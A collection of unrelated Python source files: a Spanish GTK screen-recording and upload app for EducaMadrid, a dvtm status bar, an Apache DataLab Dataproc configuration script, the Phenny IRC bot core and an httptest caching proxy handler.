message_type=Gtk.MessageType.ERROR,
buttons=Gtk.ButtonsType.CANCEL,
text="ERROR: Debe seleccionar una carpeta de grabación",
)
dialog.format_secondary_text(
"Debe seleccionar una carpeta en la que guardar la grabación."
)
dialog.run()
dialog.destroy()
return
# Se pasa de URI a archivo
if carpeta.startswith('file://'):
carpeta = carpeta[len('file://'):]
fecha = datetime.datetime.now()
#archivo = '{0}/{1}'.format(carpeta, fecha.isoformat(sep=' ', timespec='seconds').replace(':', '·'))
archivo = '{0}/{1}'.format(carpeta, fecha.isoformat(sep=' ').replace(':', '·').split('.')[0])
self.archivo_actual = '{0}.mp4'.format(archivo)
print(archivo)
#return
self.builder.get_object("grabar").set_label('Parar')
self.reiniciar_grabacion(archivo)
def onVerCamara(self, button):
if self.camara == None:
self.reiniciar_camara()
else:
#self.camara.terminate()
self.send_message(b'stop camara:')
self.reiniciar_camara()
def reiniciar_camara(self):
#command_line = 'camara: -v v4l2src device=/dev/video0 ! video/x-raw,framerate=10/1 ! videoflip method={0} ! videoflip method={1} ! videoconvert ! autovideosink\n'.format(self.rotacion, self.espejo).encode()
rotacion = ""
if self.rotacion == 'none':
rotacion = ""
elif self.rotacion == 'clockwise':
rotacion = ",transpose=1"
elif self.rotacion == 'rotate-180':
rotacion = ",transpose=2,transpose=2"
elif self.rotacion == 'counterclockwise':
rotacion = ",transpose=3,hflip"
espejo = ""
if self.espejo == 'none':
espejo = ""
elif self.espejo == 'horizontal-flip':
espejo = ",hflip"
elif self.espejo == 'vertical-flip':
espejo = ",vflip"
command_line = 'camara: -f v4l2 -i /dev/video0 -vf "format=yuv420p{0}{1}"\n'.format(rotacion, espejo).encode()
self.send_message(command_line)
self.camara = True
#command_line = 'gst-launch-1.0 -v v4l2src device=/dev/video0 ! video/x-raw,framerate=10/1 ! videoflip method={0} ! videoflip method={1} ! videoconvert ! autovideosink'.format(self.rotacion, self.espejo)
#args = shlex.split(command_line)
#self.camara = subprocess.Popen(args)
def send_message(self, command_line):
try:
if self.sock == None:
server_address = './uds_socket'
self.sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
self.sock.connect(server_address)
self.sock.sendall(command_line)
self.sock.sendall(b'\n')
if command_line.startswith(b'stop ffmpeg'):
data = self.sock.recv(1)
except socket.error as msg:
print(msg)
sys.exit(1)
#finally:
# print('closing socket')
# self.sock.close()
def onComprobarCredenciales(self, button):
if not self.builder.get_object("subir_videos").get_active():
dialog = Gtk.MessageDialog(
transient_for=self.builder.get_object("window"),
flags=0,
message_type=Gtk.MessageType.ERROR,
buttons=Gtk.ButtonsType.CANCEL,
text="ERROR: Debe activar la subida de vídeos",
)
dialog.format_secondary_text(
"Para poder comprobar las credenciales, debe activar la subida de vídeos."
)
dialog.run()
dialog.destroy()
return
# Se deben comprobar que las credenciales de conexión a EducaMadrid son correctas
# y que el servidor está activo
self.credenciales_modificadas = False
# Servidor activo
servidor = self.builder.get_object("servidor").get_text()
r = None
try:
#r = requests.post(servidor.strip()+'/cgi-bin/upload.py', data={})
r = self.check_server()
except Exception as err:
self.credenciales_modificadas = True
dialog = Gtk.MessageDialog(
transient_for=self.builder.get_object("window"),
flags=0,
message_type=Gtk.MessageType.ERROR,
buttons=Gtk.ButtonsType.CANCEL,
text="ERROR: No se puede conectar con el servidor",
)
dialog.format_secondary_text(
"Verifique que la dirección del servidor es la correcta y que el servidor está activo. Verifique que el equipo puede navegar correctamente."
)
dialog.run()
dialog.destroy()
if r:
# Servidor activo
# Se comprueban las credenciales de owncloud
oc = None
try:
oc = owncloud.Client('http://cloud.educa.madrid.org', dav_endpoint_version = 10)
usuario = self.builder.get_object("login").get_text().strip()
password = self.builder.get_object("password").get_text()
oc.login(usuario, password)
except Exception as err:
self.credenciales_modificadas = True
# Se comparten en la nube y se envían los enlaces por correo, sólo si se pasa la opción "enviar" por línea de comandos:
if oc == None:
self.credenciales_modificadas = True
if self.credenciales_modificadas:
dialog = Gtk.MessageDialog(
transient_for=self.builder.get_object("window"),
flags=0,
message_type=Gtk.MessageType.ERROR,
buttons=Gtk.ButtonsType.CANCEL,
text="ERROR: Las credenciales no son válidas",
)
dialog.format_secondary_text(
"Verifique el usuario o contraseña. Verifique que el equipo puede navegar correctamente."
)
dialog.run()
dialog.destroy()
else:
dialog = Gtk.MessageDialog(
transient_for=self.builder.get_object("window"),
flags=0,
message_type=Gtk.MessageType.INFO,
buttons=Gtk.ButtonsType.CANCEL,
text="Las credenciales son válidas",
)
dialog.format_secondary_text(
"Las credenciales son válidas."
)
dialog.run()
dialog.destroy()
else:
self.credenciales_modificadas = True
dialog = Gtk.MessageDialog(
transient_for=self.builder.get_object("window"),
flags=0,
message_type=Gtk.MessageType.ERROR,
buttons=Gtk.ButtonsType.CANCEL,
text="ERROR: No se puede conectar con el servidor",
)
dialog.format_secondary_text(
"Verifique que la dirección del servidor es la correcta y que el servidor está activo. Verifique que el equipo puede navegar correctamente."
)
dialog.run()
dialog.destroy()
def reiniciar_grabacion(self, archivo):
self.pantalla_propiedades()
# Grabación a 25 frames por segundo
#command_line = 'ffmpeg -f alsa -ac 2 -i pulse -f x11grab -r 25 -s {0}x{1} -i :0.0 -vcodec libx264 -pix_fmt yuv420p -preset ultrafast -crf 0 -threads 0 -acodec pcm_s16le -y "{2}.mkv"'.format(self.ancho_pantalla, self.alto_pantalla, archivo)
# Se graban 5 frames por segundo para disminuir el tamaño del vídeo
#command_line = 'ffmpeg -f alsa -ac 2 -i pulse -f x11grab -r 5 -s {0}x{1} -i :0.0 -vcodec libx264 -pix_fmt yuv420p -preset ultrafast -crf 0 -threads 0 -acodec pcm_s16le -y "{2}.mkv"'.format(self.ancho_pantalla, self.alto_pantalla, archivo)
# Se graba con alta compresión, microprocesador potente:
#command_line = 'ffmpeg -f alsa -ac 2 -i pulse -f x11grab -r 5 -s {0}x{1} -i :0.0 -vcodec libx265 -pix_fmt yuv420p -preset ultrafast -crf 28 -threads 0 -y "{2}.mp4"'.format(self.ancho_pantalla, self.alto_pantalla, archivo)
# Se graba con compresión, microprocesador no potente:
#command_line = 'ffmpeg -f alsa -ac 2 -i pulse -f x11grab -r 5 -s {0}x{1} -i :0.0 -vcodec libx264 -pix_fmt yuv420p -preset ultrafast -crf 28 -threads 0 -y "{2}.mp4"'.format(self.ancho_pantalla, self.alto_pantalla, archivo)
#print(command_line)
#args = shlex.split(command_line)
#self.grabacion = subprocess.Popen(args)
#command_line = 'ffmpeg: -f alsa -ac 2 -i pulse -f x11grab -r 5 -s {0}x{1} -i :0.0 -vcodec libx264 -pix_fmt yuv420p -preset ultrafast -crf 28 -threads 0 -y "{2}.mp4"'.format(self.ancho_pantalla, self.alto_pantalla, archivo).encode()
command_line = 'ffmpeg: -f alsa -ac 2 -i pulse -f x11grab -r 5 -s {0}x{1} -i :0.0 -vcodec libx264 -strict -2 -pix_fmt yuv420p -preset ultrafast -crf 28 -threads 0 -y "{2}.mp4"'.format(self.ancho_pantalla, self.alto_pantalla, archivo).encode()
print(command_line)
self.send_message(command_line)
self.grabacion = True
def pantalla_propiedades(self):
fin = os.popen('xwininfo -root')
for linea in fin:
l = linea.strip()
if l.startswith('Height:'):
self.alto_pantalla = l[len('Height:'):].strip()
elif l.startswith('Width:'):
self.ancho_pantalla = l[len('Width:'):].strip()
fin.close()
def check_server(self):
ok = False
# Create a TCP/IP socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Connect the socket to the port where the server is listening
servidor = self.builder.get_object("servidor").get_text()
if ':' in servidor:
try:
server_address = (servidor.split(':')[0], int(servidor.split(':')[1]))
print('connecting to {} port {}'.format(*server_address))
sock.connect(server_address)
# Send data
message = b'\n'
print('sending {!r}'.format(message))
sock.sendall(message)
ok = True
except Exception as err:
print('Error:', err)
finally:
print('closing socket')
sock.close()
return ok
def subir_al_servidor(self):
print("Subiendo al servidor...")
servidor = self.builder.get_object("servidor").get_text().strip()
login = self.builder.get_object("login").get_text().strip()
password = self.builder.get_object("password").get_text().strip()
curso = self.builder.get_object("curso").get_text().strip().upper()
#with open(self.archivo_actual, 'rb') as f:
# r = requests.post(servidor.strip()+'/cgi-bin/upload.py',
# data={'login': login, 'password': password, 'ruta': '/CLASES/{0}'.format(curso)},
# files={'file': f})
# print(r.text)
#time.sleep(10)
# Create a TCP/IP socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Connect the socket to the port where the server is listening
servidor = self.builder.get_object("servidor").get_text()
if ':' in servidor:
try:
server_address = (servidor.split(':')[0], int(servidor.split(':')[1]))
print('connecting to {} port {}'.format(*server_address))
sock.connect(server_address)
# Send data
message = 'login={0}\n'.format(login)
sock.sendall(message.encode())
message = 'password={0}\n'.format(password)
sock.sendall(message.encode())
message = 'ruta=/CLASES/{0}\n'.format(curso)
sock.sendall(message.encode())
message = 'filename={0}\n'.format(self.archivo_actual)
sock.sendall(message.encode())
sock.sendall(b'####\n')
fin = open(self.archivo_actual, 'rb')
while True:
data = fin.read(1024)
#print(data)
if data:
sock.sendall(data)
else:
break
fin.close()
except Exception as err:
print('Error en cliente:', err)
finally:
print('closing socket')
sock.close()
print("Fin de la subida")
if self.mostrar_mensaje_fin_subida:
GLib.idle_add(self.onMensajeFinSubida)
#include main_glade main.glade
builder = Gtk.Builder()
#builder.add_from_string(main_glade)
builder.add_from_file('main.glade')
builder.connect_signals(Handler(builder))
window = builder.get_object("window")
window.show_all()
Gtk.main()
|
dvtmstatus.py | from threading import Thread
import sys
class Writer:
def __init__(self, parent):
self.value = ''
self.parent = parent
def write(self, value):
self.value = value
self.parent.write()
def __str__(self):
return str(self.value)
class StatusBar:
def __init__(self, *values):
self.items = []
for v in values:
if callable(v):
writer = Writer(self)
thread = Thread(target=v, args=(writer,), daemon=True)
self.items.append((writer, thread))
else:
self.items.append((v, None))
def write(self):
print(''.join(str(i[0]) for i in self.items))
sys.stdout.flush()
def start(self):
threads = [i[1] for i in self.items if i[1] is not None]
for t in threads:
t.start()
for t in threads:
t.join()
|
dataengine-service_configure.py | #!/usr/bin/python3
# *****************************************************************************
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
# ******************************************************************************
import datalab.actions_lib
import datalab.fab
import datalab.meta_lib
import datalab.notebook_lib
import json
import logging
import multiprocessing
import os
import sys
import traceback
import subprocess
from fabric import *
def configure_dataengine_service(instance, dataproc_conf):
dataproc_conf['instance_ip'] = GCPMeta.get_private_ip_address(instance)
# configuring proxy on Data Engine service
try:
logging.info('[CONFIGURE PROXY ON DATAENGINE SERVICE]')
print('[CONFIGURE PROXY ON DATAENGINE SERVICE]')
additional_config = {"proxy_host": dataproc_conf['edge_instance_name'], "proxy_port": "3128"}
params = "--hostname {} --instance_name {} --keyfile {} --additional_config '{}' --os_user {}" \
.format(dataproc_conf['instance_ip'], dataproc_conf['cluster_name'], dataproc_conf['key_path'],
json.dumps(additional_config), dataproc_conf['datalab_ssh_user'])
try:
subprocess.run("~/scripts/{}.py {}".format('common_configure_proxy', params), shell=True, check=True)
except:
traceback.print_exc()
raise Exception
except Exception as err:
datalab.fab.append_result("Failed to configure proxy.", str(err))
GCPActions.delete_dataproc_cluster(dataproc_conf['cluster_name'], os.environ['gcp_region'])
sys.exit(1)
try:
logging.info('[CONFIGURE DATAENGINE SERVICE]')
print('[CONFIGURE DATAENGINE SERVICE]')
try:
global conn
conn = datalab.fab.init_datalab_connection(dataproc_conf['instance_ip'], dataproc_conf['datalab_ssh_user'], dataproc_conf['key_path'])
datalab.fab.configure_data_engine_service_livy(dataproc_conf['instance_ip'],
dataproc_conf['datalab_ssh_user'],
dataproc_conf['key_path'])
datalab.notebook_lib.install_os_pkg([['python3-pip', 'N/A']])
datalab.fab.configure_data_engine_service_pip(dataproc_conf['instance_ip'],
dataproc_conf['datalab_ssh_user'],
dataproc_conf['key_path'])
except:
traceback.print_exc()
raise Exception
except Exception as err:
datalab.fab.append_result("Failed to configure dataengine service.", str(err))
GCPActions.delete_dataproc_cluster(dataproc_conf['cluster_name'], os.environ['gcp_region'])
sys.exit(1)
try:
print('[SETUP EDGE REVERSE PROXY TEMPLATE]')
logging.info('[SETUP EDGE REVERSE PROXY TEMPLATE]')
slaves = []
for idx, instance in enumerate(dataproc_conf['cluster_core_instances']):
slave_ip = GCPMeta.get_private_ip_address(instance)
slave = {
'name': 'datanode{}'.format(idx + 1),
'ip': slave_ip,
'dns': "{0}.c.{1}.internal".format(instance, os.environ['gcp_project_id'])
}
slaves.append(slave)
additional_info = {
"computational_name": dataproc_conf['computational_name'],
"master_ip": dataproc_conf['master_ip'],
"master_dns": "{0}.c.{1}.internal".format(dataproc_conf['master_name'], os.environ['gcp_project_id']),
"slaves": slaves,
"tensor": False
}
params = "--edge_hostname {} " \
"--keyfile {} " \
"--os_user {} " \
"--type {} " \
"--exploratory_name {} " \
"--additional_info '{}'"\
.format(dataproc_conf['edge_instance_hostname'],
dataproc_conf['key_path'],
dataproc_conf['datalab_ssh_user'],
'dataengine-service',
dataproc_conf['exploratory_name'],
json.dumps(additional_info))
try:
subprocess.run("~/scripts/{}.py {}".format('common_configure_reverse_proxy', params), shell=True, check=True)
except:
datalab.fab.append_result("Failed edge reverse proxy template")
raise Exception
except Exception as err:
datalab.fab.append_result("Failed to configure reverse proxy.", str(err))
GCPActions.delete_dataproc_cluster(dataproc_conf['cluster_name'], os.environ['gcp_region'])
sys.exit(1)
if __name__ == "__main__":
local_log_filename = "{}_{}_{}.log".format(os.environ['conf_resource'], os.environ['project_name'],
os.environ['request_id'])
local_log_filepath = "/logs/" + os.environ['conf_resource'] + "/" + local_log_filename
logging.basicConfig(format='%(levelname)-8s [%(asctime)s] %(message)s',
level=logging.INFO,
filename=local_log_filepath)
try:
GCPMeta = datalab.meta_lib.GCPMeta()
GCPActions = datalab.actions_lib.GCPActions()
print('Generating infrastructure names and tags')
dataproc_conf = dict()
if 'exploratory_name' in os.environ:
dataproc_conf['exploratory_name'] = os.environ['exploratory_name'].replace('_', '-').lower()
else:
dataproc_conf['exploratory_name'] = ''
if 'computational_name' in os.environ:
dataproc_conf['computational_name'] = os.environ['computational_name'].replace('_', '-').lower()
else:
dataproc_conf['computational_name'] = ''
dataproc_conf['service_base_name'] = (os.environ['conf_service_base_name'])
dataproc_conf['edge_user_name'] = (os.environ['edge_user_name'])
dataproc_conf['project_name'] = (os.environ['project_name']).replace('_', '-').lower()
dataproc_conf['endpoint_name'] = (os.environ['endpoint_name']).replace('_', '-').lower()
dataproc_conf['key_name'] = os.environ['conf_key_name']
dataproc_conf['key_path'] = '{0}{1}.pem'.format(os.environ['conf_key_dir'], os.environ['conf_key_name'])
dataproc_conf['region'] = os.environ['gcp_region']
dataproc_conf['zone'] = os.environ['gcp_zone']
dataproc_conf['subnet'] = '{0}-{1}-{2}-subnet'.format(dataproc_conf['service_base_name'],
dataproc_conf['project_name'],
dataproc_conf['endpoint_name'])
dataproc_conf['cluster_name'] = '{0}-{1}-{2}-des-{3}'.format(dataproc_conf['service_base_name'],
dataproc_conf['project_name'],
dataproc_conf['endpoint_name'],
dataproc_conf['computational_name'])
dataproc_conf['cluster_tag'] = '{0}-{1}-{2}-ps'.format(dataproc_conf['service_base_name'],
dataproc_conf['project_name'],
dataproc_conf['endpoint_name'])
dataproc_conf['bucket_name'] = '{0}-{1}-{2}-bucket'.format(dataproc_conf['service_base_name'],
dataproc_conf['project_name'],
dataproc_conf['endpoint_name'])
dataproc_conf['release_label'] = os.environ['dataproc_version']
dataproc_conf['cluster_label'] = {os.environ['notebook_instance_name']: "not-configured"}
dataproc_conf['dataproc_service_account_name'] = '{0}-{1}-{2}-ps-sa'.format(dataproc_conf['service_base_name'],
dataproc_conf['project_name'],
dataproc_conf['endpoint_name'])
dataproc_conf['dataproc_unique_index'] = GCPMeta.get_index_by_service_account_name(
dataproc_conf['dataproc_service_account_name'])
service_account_email = "{}-{}@{}.iam.gserviceaccount.com".format(dataproc_conf['service_base_name'],
dataproc_conf['dataproc_unique_index'],
os.environ['gcp_project_id'])
dataproc_conf['edge_instance_name'] = '{0}-{1}-{2}-edge'.format(dataproc_conf['service_base_name'],
dataproc_conf['project_name'],
dataproc_conf['endpoint_name'])
dataproc_conf['edge_instance_hostname'] = GCPMeta.get_instance_public_ip_by_name(
dataproc_conf['edge_instance_name'])
dataproc_conf['datalab_ssh_user'] = os.environ['conf_os_user']
dataproc_conf['master_name'] = dataproc_conf['cluster_name'] + '-m'
dataproc_conf['master_ip'] = GCPMeta.get_private_ip_address(dataproc_conf['master_name'])
except Exception as err:
datalab.fab.append_result("Failed to generate variables dictionary.", str(err))
GCPActions.delete_dataproc_cluster(dataproc_conf['cluster_name'], os.environ['gcp_region'])
sys.exit(1)
try:
res = GCPMeta.get_list_instances(os.environ['gcp_zone'], dataproc_conf['cluster_name'])
dataproc_conf['cluster_instances'] = [i.get('name') for i in res['items']]
except Exception as err:
traceback.print_exc()
raise Exception
dataproc_conf['cluster_core_instances'] = list()
for instance in dataproc_conf['cluster_instances']:
if "{}-w-".format(dataproc_conf['cluster_name']) in instance:
dataproc_conf['cluster_core_instances'].append(instance)
try:
jobs = []
for instance in dataproc_conf['cluster_instances']:
p = multiprocessing.Process(target=configure_dataengine_service, args=(instance, dataproc_conf))
jobs.append(p)
p.start()
for job in jobs:
job.join()
for job in jobs:
if job.exitcode != 0:
raise Exception
except Exception as err:
GCPActions.delete_dataproc_cluster(dataproc_conf['cluster_name'], os.environ['gcp_region'])
datalab.fab.append_result("Failed to configure Dataengine-service", str(err))
traceback.print_exc()
raise Exception
try:
dataproc_master_access_url = "https://" + dataproc_conf['edge_instance_hostname'] + "/{}/".format(
dataproc_conf['exploratory_name'] + '_' + dataproc_conf['computational_name'])
logging.info('[SUMMARY]')
print('[SUMMARY]')
print("Service base name: {}".format(dataproc_conf['service_base_name']))
print("Cluster name: {}".format(dataproc_conf['cluster_name']))
print("Key name: {}".format(dataproc_conf['key_name']))
print("Region: {}".format(dataproc_conf['region']))
print("Zone: {}".format(dataproc_conf['zone']))
print("Subnet: {}".format(dataproc_conf['subnet']))
print("Dataproc version: {}".format(dataproc_conf['release_label']))
print("Dataproc master node shape: {}".format(os.environ['dataproc_master_instance_type']))
print("Dataproc slave node shape: {}".format(os.environ['dataproc_slave_instance_type']))
print("Master count: {}".format(os.environ['dataproc_master_count']))
print("Slave count: {}".format(os.environ['dataproc_slave_count']))
print("Preemptible count: {}".format(os.environ['dataproc_preemptible_count']))
print("Notebook hostname: {}".format(os.environ['notebook_instance_name']))
print("Bucket name: {}".format(dataproc_conf['bucket_name']))
with open("/root/result.json", 'w') as result:
res = {"hostname": dataproc_conf['cluster_name'],
"key_name": dataproc_conf['key_name'],
"instance_id": dataproc_conf['cluster_name'],
"user_own_bucket_name": dataproc_conf['bucket_name'],
"Action": "Create new Dataproc cluster",
"computational_url": [
{"description": "Dataproc Master",
"url": dataproc_master_access_url}
]
}
print(json.dumps(res))
result.write(json.dumps(res))
except Exception as err:
datalab.fab.append_result("Error with writing results", str(err))
GCPActions.delete_dataproc_cluster(dataproc_conf['cluster_name'], os.environ['gcp_region'])
sys.exit(1)
|
bot.py | #!/usr/bin/env python
import sys, os, re, threading, imp
import irc
home = os.getcwd()
def decode(bytes):
try: text = bytes.decode('utf-8')
except UnicodeDecodeError:
try: text = bytes.decode('iso-8859-1')
except UnicodeDecodeError:
text = bytes.decode('cp1252')
return text
class Phenny(irc.Bot):
def __init__(self, config):
args = (config.nick, config.name, config.channels, config.password)
irc.Bot.__init__(self, *args)
self.config = config
self.doc = {}
self.stats = {}
self.setup()
def setup(self):
self.variables = {}
filenames = []
if not hasattr(self.config, 'enable'):
for fn in os.listdir(os.path.join(home, 'modules')):
if fn.endswith('.py') and not fn.startswith('_'):
filenames.append(os.path.join(home, 'modules', fn))
else:
for fn in self.config.enable:
filenames.append(os.path.join(home, 'modules', fn + '.py'))
if hasattr(self.config, 'extra'):
for fn in self.config.extra:
if os.path.isfile(fn):
filenames.append(fn)
elif os.path.isdir(fn):
for n in os.listdir(fn):
if n.endswith('.py') and not n.startswith('_'):
filenames.append(os.path.join(fn, n))
modules = []
excluded_modules = getattr(self.config, 'exclude', [])
for filename in filenames:
name = os.path.basename(filename)[:-3]
if name in excluded_modules: continue
# if name in sys.modules:
# del sys.modules[name]
try: module = imp.load_source(name, filename)
except Exception, e:
print >> sys.stderr, "Error loading %s: %s (in bot.py)" % (name, e)
else:
if hasattr(module, 'setup'):
module.setup(self)
self.register(vars(module))
modules.append(name)
if modules:
print >> sys.stderr, 'Registered modules:', ', '.join(modules)
else: print >> sys.stderr, "Warning: Couldn't find any modules"
self.bind_commands()
def register(self, variables):
# This is used by reload.py, hence it being methodised
for name, obj in variables.iteritems():
if hasattr(obj, 'commands') or hasattr(obj, 'rule'):
self.variables[name] = obj
def bind_commands(self):
self.commands = {'high': {}, 'medium': {}, 'low': {}}
def bind(self, priority, regexp, func):
print priority, regexp.pattern.encode('utf-8'), func
# register documentation
if not hasattr(func, 'name'):
func.name = func.__name__
if func.__doc__:
if hasattr(func, 'example'):
example = func.example
example = example.replace('$nickname', self.nick)
else: example = None
self.doc[func.name] = (func.__doc__, example)
self.commands[priority].setdefault(regexp, []).append(func)
def sub(pattern, self=self):
# These replacements have significant order
pattern = pattern.replace('$nickname', re.escape(self.nick))
return pattern.replace('$nick', r'%s[,:] +' % re.escape(self.nick))
for name, func in self.variables.iteritems():
# print name, func
if not hasattr(func, 'priority'):
func.priority = 'medium'
if not hasattr(func, 'thread'):
func.thread = True
if not hasattr(func, 'event'):
func.event = 'PRIVMSG'
else: func.event = func.event.upper()
if hasattr(func, 'rule'):
if isinstance(func.rule, str):
pattern = sub(func.rule)
regexp = re.compile(pattern)
bind(self, func.priority, regexp, func)
if isinstance(func.rule, tuple):
# 1) e.g. ('$nick', '(.*)')
if len(func.rule) == 2 and isinstance(func.rule[0], str):
prefix, pattern = func.rule
prefix = sub(prefix)
regexp = re.compile(prefix + pattern)
bind(self, func.priority, regexp, func)
# 2) e.g. (['p', 'q'], '(.*)')
elif len(func.rule) == 2 and isinstance(func.rule[0], list):
prefix = self.config.prefix
commands, pattern = func.rule
for command in commands:
command = r'(%s)\b(?: +(?:%s))?' % (command, pattern)
regexp = re.compile(prefix + command)
bind(self, func.priority, regexp, func)
# 3) e.g. ('$nick', ['p', 'q'], '(.*)')
elif len(func.rule) == 3:
prefix, commands, pattern = func.rule
prefix = sub(prefix)
for command in commands:
command = r'(%s) +' % command
regexp = re.compile(prefix + command + pattern)
bind(self, func.priority, regexp, func)
if hasattr(func, 'commands'):
for command in func.commands:
template = r'^%s(%s)(?: +(.*))?$'
pattern = template % (self.config.prefix, command)
regexp = re.compile(pattern)
bind(self, func.priority, regexp, func)
def wrapped(self, origin, text, match):
class PhennyWrapper(object):
def __init__(self, phenny):
self.bot = phenny
def __getattr__(self, attr):
sender = origin.sender or text
if attr == 'reply':
return (lambda msg:
self.bot.msg(sender, origin.nick + ': ' + msg))
elif attr == 'say':
return lambda msg: self.bot.msg(sender, msg)
return getattr(self.bot, attr)
return PhennyWrapper(self)
def input(self, origin, text, bytes, match, event, args):
class CommandInput(unicode):
def __new__(cls, text, origin, bytes, match, event, args):
s = unicode.__new__(cls, text)
s.sender = origin.sender
s.nick = origin.nick
s.event = event
s.bytes = bytes
s.match = match
s.group = match.group
s.groups = match.groups
s.args = args
s.admin = origin.nick in self.config.admins
s.owner = origin.nick == self.config.owner
return s
return CommandInput(text, origin, bytes, match, event, args)
def call(self, func, origin, phenny, input):
try: func(phenny, input)
except Exception, e:
self.error(origin)
def limit(self, origin, func):
if origin.sender and origin.sender.startswith('#'):
if hasattr(self.config, 'limit'):
limits = self.config.limit.get(origin.sender)
if limits and (func.__module__ not in limits):
return True
return False
def dispatch(self, origin, args):
bytes, event, args = args[0], args[1], args[2:]
text = decode(bytes)
for priority in ('high', 'medium', 'low'):
items = self.commands[priority].items()
for regexp, funcs in items:
for func in funcs:
if event != func.event and func.event != '*': continue
match = regexp.match(text)
if match:
if self.limit(origin, func): continue
phenny = self.wrapped(origin, text, match)
input = self.input(origin, text, bytes, match, event, args)
if func.thread:
targs = (func, origin, phenny, input)
t = threading.Thread(target=self.call, args=targs)
t.start()
else: self.call(func, origin, phenny, input)
for source in [origin.sender, origin.nick]:
try: self.stats[(func.name, source)] += 1
except KeyError:
self.stats[(func.name, source)] = 1
if __name__ == '__main__':
print __doc__
|
httptest.py | #!/usr/bin/env python3
'''
httptest offers the Handler for serving test data and the HTTPServer
which is started and stopped using the httptest.Server() decorator.
'''
import os
import io
import json
import hashlib
import inspect
import selectors
import threading
import http.server
import urllib.request
import multiprocessing
from urllib.parse import urlparse, urljoin
from contextlib import contextmanager
if getattr(http.server, 'ThreadingHTTPServer', False):
ThreadingHTTPServer = http.server.ThreadingHTTPServer
else:
import socketserver
class ThreadingHTTPServer(socketserver.ThreadingMixIn,
http.server.HTTPServer):
pass
class FailedToStart(Exception):
'''
The server failed to start so a NoServer instance was created
'''
pass
class AlreadyStarted(Exception):
'''
The server cannot be started because it is already running
'''
pass
class NotStarted(Exception):
'''
The server cannot be stopped because it isn't running
'''
pass
class Handler(http.server.SimpleHTTPRequestHandler):
'''
Handler to use with httptest.Server
'''
def json(self, data):
'''
Send a 200 with Content-type application/json using data as
the json data to send.
'''
self.send_response(200)
self.send_header('Content-type', 'application/json')
self.end_headers()
self.wfile.write(json.dumps(data).encode('utf-8'))
#pylint: disable=arguments-differ
def log_message(self, *args):
'''
Disables server logs
'''
pass
class CachingProxyHandler(Handler):
'''
Handler to use with httptest.Server which caches requests to an upstream
server.
'''
@classmethod
def to(cls, upstream, state_dir=None):
'''
Creates a CachingProxyHandler which will proxy requests to an upstream
server.
'''
if state_dir is None:
state_dir = os.path.join(os.getcwd(), '.cache', 'httptest')
upstream = urlparse(upstream)
class ConfiguredCachingProxyHandler(cls):
UPSTREAM = upstream
STATE_DIR = state_dir
return ConfiguredCachingProxyHandler
def proxied_url(self):
url = self.UPSTREAM.geturl() + self.path
while '//' in url:
url = url.replace('//', '/')
return url.replace(':/', '://')
def cache_path(self, *args):
if not os.path.isdir(self.STATE_DIR):
os.makedirs(self.STATE_DIR)
return os.path.join(self.STATE_DIR, *args)
def cached(self, key):
return bool(all(list(map(lambda needed: \
os.path.isfile(self.cache_path(key + needed)),
['.status', '.headers', '.body']))))
def cache_key(self):
body = None
if 'Content-Length' in self.headers:
length = int(self.headers['Content-Length'])
body = io.BytesIO(self.rfile.read(length))
digest = hashlib.sha384()
digest.update(self.requestline.encode('utf-8', errors='ignore'))
def sort_headers(kv):
'''
Sort headers dict so it always is in the same order.
'''
return kv[0].lower()
for k, v in sorted(self.headers.items(), key=sort_headers):
digest.update(k.encode('utf-8', errors='ignore'))
digest.update(v.encode('utf-8', errors='ignore'))
if body is not None:
digest.update(body.read())
body.seek(0)
return digest.hexdigest(), body
@contextmanager
def save_cache(self, key, status, headers, body):
with open(self.cache_path(key + '.hits'), 'w') as fd:
fd.write(str(0))
with open(self.cache_path(key + '.status'), 'w') as fd:
fd.write(str(status))
with open(self.cache_path(key + '.headers'), 'w') as fd:
json.dump(dict(headers._headers), fd)
with open(self.cache_path(key + '.body'), 'wb') as fd:
fd.write(body.read())
with open(self.cache_path(key + '.body'), 'rb') as fd:
yield fd
@contextmanager
def load_cache(self, key):
if os.path.exists(self.cache_path(key + '.hits')):
with open(self.cache_path(key + '.hits'), 'r') as fd:
hits = int(fd.read())
with open(self.cache_path(key + '.hits'), 'w') as fd:
fd.write(str(hits + 1))
with open(self.cache_path(key + '.status'), 'r') as fd:
status = int(fd.read())
with open(self.cache_path(key + '.headers'), 'r') as fd:
headers = json.load(fd)
with open(self.cache_path(key + '.body'), 'rb') as fd:
yield status, headers, fd
def do_forward(self):
'''
Forward the request by making a similar request with urllib
'''
self.headers.replace_header('Host', self.UPSTREAM.netloc)
key, data = self.cache_key()
if self.cached(key):
# Load from cache
if data is not None:
data.close()
with self.load_cache(key) as (status, headers, fd):
self.send_response(status)
for header, content in headers.items():
self.send_header(header, content)
self.end_headers()
try:
self.wfile.write(fd.read())
except BrokenPipeError:
pass
else:
# Run request (not cached)
req = urllib.request.Request(self.proxied_url(),
headers=self.headers,
data=data,
method=self.command)
try:
with urllib.request.urlopen(req) as f:
self.send_response(f.status)
for header, content in f.headers.items():
self.send_header(header, content)
self.end_headers()
with self.save_cache(key, f.status, f.headers, f) as c:
try:
self.wfile.write(c.read())
except BrokenPipeError:
pass
except urllib.error.HTTPError as e:
self.send_response(e.status, message=e.reason)
for header, content in e.headers.items():
self.send_header(header, content)
self.end_headers()
try:
self.wfile.write(e.read())
except BrokenPipeError:
pass
# Make sure CachingProxyHandler responds to all HTTP methods
for method in 'GET HEAD POST PUT DELETE CONNECT OPTIONS TRACE PATCH'.split():
setattr(CachingProxyHandler, 'do_' + method, CachingProxyHandler.do_forward)
class HTTPServer(ThreadingHTTPServer):
'''
Starts and manages the running server process.
'''
allow_reuse_address = True
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.__server = False
self.__send = False
#pylint: disable=arguments-differ
def serve_forever(self, addr_queue, pipe):
'''
Start the server handle requests and wait for shutdown.
'''
addr_queue.put(self.server_name)
